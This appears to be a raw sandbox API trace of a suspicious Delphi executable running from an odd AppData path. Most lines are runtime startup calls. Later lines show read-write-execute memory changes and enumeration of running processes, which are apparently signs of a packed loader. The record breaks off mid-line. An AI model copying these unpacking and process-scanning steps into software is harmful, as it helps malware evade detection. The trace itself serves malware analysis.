[0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarIdiv") returned 0x75edf00a [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarMod") returned 0x75edf15e [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarAnd") returned 0x75e85a98 [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarOr") returned 0x75edecfa [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarXor") returned 0x75edee2e [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarCmp") returned 0x75e7b0dc [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarI4FromStr") returned 0x75e76fab [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarR4FromStr") returned 0x75e801a0 [0100.131] GetProcAddress (hModule=0x75e60000, lpProcName="VarR8FromStr") returned 0x75e7699e [0100.131] GetProcAddress (hModule=0x75e60000, lpProcName="VarDateFromStr") returned 0x75e86ba7 [0100.131] GetProcAddress (hModule=0x75e60000, lpProcName="VarCyFromStr") returned 0x75ea6c12 [0100.131] GetProcAddress (hModule=0x75e60000, lpProcName="VarBoolFromStr") returned 0x75e7dbd1 [0100.131] GetProcAddress (hModule=0x75e60000, lpProcName="VarBstrFromCy") returned 0x75e87fdc [0100.131] GetProcAddress (hModule=0x75e60000, lpProcName="VarBstrFromDate") returned 0x75e77a2a [0100.131] GetProcAddress (hModule=0x75e60000, lpProcName="VarBstrFromBool") returned 0x75e80355 [0100.131] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8 [0100.131] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xac [0100.131] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0100.132] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x770d0000 [0100.132] GetDC (hWnd=0x0) returned 0x460107ae [0100.132] GetDeviceCaps (hdc=0x460107ae, index=90) returned 96 [0100.132] ReleaseDC (hWnd=0x0, hDC=0x460107ae) returned 1 [0100.132] GetDC (hWnd=0x0) returned 0x460107ae [0100.132] GetDeviceCaps (hdc=0x460107ae, index=104) returned 0 [0100.132] ReleaseDC (hWnd=0x0, hDC=0x460107ae) returned 1 [0100.132] CreatePalette (plpal=0x18fb30) returned 0x5b080ada [0100.132] GetStockObject (i=7) returned 0x1b00017 [0100.132] GetStockObject (i=5) returned 0x1900015 [0100.132] GetStockObject (i=13) returned 0x18a002e [0100.132] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0100.132] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0100.132] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0100.132] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0100.132] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0100.133] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e7 [0100.133] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f8 [0100.133] GetCurrentThreadId () returned 0xec8 [0100.133] GlobalAddAtomA (lpString="WndProcPtr0040000000000EC8") returned 0xc143 [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0100.133] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0100.134] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0100.135] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0100.135] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1f3 [0100.135] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1f4 [0100.135] GetVersion () returned 0x1db10106 [0100.135] GetCurrentProcessId () returned 0xec4 [0100.135] GlobalAddAtomA (lpString="Delphi00000EC4") returned 0xc142 [0100.135] GetCurrentThreadId () returned 0xec8 [0100.135] GlobalAddAtomA (lpString="ControlOfs0040000000000EC8") returned 0xc141 [0100.135] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000EC8") returned 0xc1c4 [0100.135] GetProcAddress (hModule=0x770d0000, lpProcName="GetMonitorInfoA") returned 0x770f4413 [0100.135] GetProcAddress (hModule=0x770d0000, lpProcName="GetSystemMetrics") returned 0x770e7d2f [0100.135] GetSystemMetrics (nIndex=19) returned 1 [0100.197] GetSystemMetrics (nIndex=75) returned 1 [0100.197] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x4f1320, fWinIni=0x0 | out: pvParam=0x4f1320) returned 1 [0100.197] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0100.197] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0100.197] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x402e5 [0100.198] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0100.198] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0100.198] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0100.198] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x402d1 [0100.198] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x402c3 [0100.198] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x402c1 [0100.198] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x702bf [0100.198] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x602b5 [0100.199] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x50279 [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0100.199] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0100.199] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0100.199] GetDC (hWnd=0x0) returned 0x460107ae [0100.199] GetDeviceCaps (hdc=0x460107ae, index=90) returned 96 [0100.199] ReleaseDC (hWnd=0x0, hDC=0x460107ae) returned 1 [0100.199] GetProcAddress (hModule=0x770d0000, lpProcName="EnumDisplayMonitors") returned 0x770f451a [0100.200] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4505a4, dwData=0x4f156c) returned 1 [0100.200] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0100.200] CreateFontIndirectA (lplf=0x18fe97) returned 0x490a0afb [0100.200] GetObjectA (in: h=0x490a0afb, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0100.200] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0100.200] CreateFontIndirectA (lplf=0x18fe1f) returned 0x110a0ad8 [0100.200] GetObjectA (in: h=0x110a0ad8, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0100.200] CreateFontIndirectA (lplf=0x18fde3) returned 0x3a0a0acb [0100.200] GetObjectA (in: h=0x3a0a0acb, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0100.201] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x8025b [0100.203] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0100.203] OemToCharA (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe") returned 1 [0100.204] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0100.204] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0100.204] RegisterClassA (lpWndClass=0x46de54) returned 0xc5c1c6 [0100.204] GetSystemMetrics (nIndex=0) returned 1440 [0100.204] GetSystemMetrics (nIndex=1) returned 900 [0100.204] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="sjfhjjskfsf", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x402f2 [0100.208] SetWindowLongA (hWnd=0x402f2, nIndex=-4, dwNewLong=2166767) returned 4219884 [0100.209] SendMessageA (hWnd=0x402f2, Msg=0x80, wParam=0x1, lParam=0x8025b) returned 0x0 [0100.209] NtdllDefWindowProc_A (hWnd=0x402f2, Msg=0x80, wParam=0x1, lParam=0x8025b) returned 0x0 [0100.227] NtdllDefWindowProc_A (hWnd=0x402f2, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x402c7 [0100.228] SetClassLongA (hWnd=0x402f2, nIndex=-14, dwNewLong=524891) returned 0x0 [0100.229] GetSystemMenu (hWnd=0x402f2, bRevert=0) returned 0x702b7 [0100.230] DeleteMenu (hMenu=0x702b7, uPosition=0xf030, uFlags=0x0) returned 1 [0100.230] DeleteMenu (hMenu=0x702b7, uPosition=0xf000, uFlags=0x0) returned 1 [0100.230] DeleteMenu (hMenu=0x702b7, uPosition=0xf010, uFlags=0x0) returned 1 [0100.230] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0100.231] GetModuleHandleA (lpModuleName="USER32") returned 0x770d0000 [0100.232] GetProcAddress (hModule=0x770d0000, lpProcName="AnimateWindow") returned 0x770fb531 [0100.232] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75540000 [0100.232] GetProcAddress (hModule=0x75540000, lpProcName="InitializeFlatSB") returned 0x7557266f [0100.232] GetProcAddress (hModule=0x75540000, lpProcName="UninitializeFlatSB") returned 0x75572542 [0100.232] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_GetScrollProp") returned 0x75571d29 [0100.232] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_SetScrollProp") returned 0x7557238d [0100.233] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_EnableScrollBar") returned 0x755720c9 [0100.233] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_ShowScrollBar") returned 0x75571fdb [0100.233] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_GetScrollRange") returned 0x75571e8d [0100.233] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_GetScrollInfo") returned 0x75571f0f [0100.233] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_GetScrollPos") returned 0x75571ccd [0100.233] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_SetScrollPos") returned 0x7557216d [0100.233] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_SetScrollInfo") returned 0x755722be [0100.233] GetProcAddress (hModule=0x75540000, lpProcName="FlatSB_SetScrollRange") returned 0x755721e2 [0100.233] GetModuleHandleA (lpModuleName="User32.dll") returned 0x770d0000 [0100.233] GetProcAddress (hModule=0x770d0000, lpProcName="SetLayeredWindowAttributes") returned 0x7710ec88 [0100.233] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0100.233] LoadBitmapA (hInstance=0x0, lpBitmapName=0x7ff7) returned 0x68050aee [0100.234] GetObjectA (in: h=0x68050aee, c=84, pv=0x18fed0 | out: pv=0x18fed0) returned 24 [0100.234] DeleteObject (ho=0x68050aee) returned 1 [0100.234] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc197 [0100.234] DdeInitializeA (in: pidInst=0x4f1ee0, pfnCallback=0x459c74, afCmd=0x0, ulRes=0x0 | out: pidInst=0x4f1ee0) returned 0x0 [0100.235] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe00, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0100.235] DdeCreateStringHandleA (idInst=0x1000080, psz="sjfhjjskfsf", iCodePage=1004) returned 0xc000 [0100.235] DdeNameService (idInst=0x1000080, hsz1=0xc000, hsz2=0x0, afCmd=0x1) returned 0x1 [0100.237] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x46fc24, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0100.237] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0100.237] SelectPalette (hdc=0x0, hPal=0x0, bForceBkgd=0) returned 0x0 [0100.237] GetLastError () returned 0x6 [0100.237] GetLocalTime (in: lpSystemTime=0x46fc04 | out: lpSystemTime=0x46fc04*(wYear=0x7e4, wMonth=0x8, wDayOfWeek=0x2, wDay=0x4, wHour=0x17, wMinute=0x19, wSecond=0x21, wMilliseconds=0x2a1)) [0100.237] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0100.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x46fbfc | out: lpSystemTimeAsFileTime=0x46fbfc*(dwLowDateTime=0x8d085d00, dwHighDateTime=0x1d66ab6)) [0100.237] FileTimeToSystemTime (in: lpFileTime=0x46fbfc, lpSystemTime=0x46fc14 | out: lpSystemTime=0x46fc14) returned 1 [0100.237] VirtualProtect (in: lpAddress=0x45c361, dwSize=0xfd9d, flNewProtect=0x40, lpflOldProtect=0x18ff24 | out: lpflOldProtect=0x18ff24*=0x20) returned 1 [0100.240] VirtualAlloc (lpAddress=0x0, dwSize=0x31c, flAllocationType=0x3000, flProtect=0x4) returned 0x270000 [0100.320] LoadLibraryA (lpLibFileName="shell32") returned 0x76260000 [0100.320] LoadLibraryA (lpLibFileName="user32") returned 0x770d0000 [0100.320] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x280000 [0100.321] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f894, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0100.321] VirtualAlloc (lpAddress=0x0, dwSize=0x7fee0, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0100.321] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe4 [0100.327] Process32FirstW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.327] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.328] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.328] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.329] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.329] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.330] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.330] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.331] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.331] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.332] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.332] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 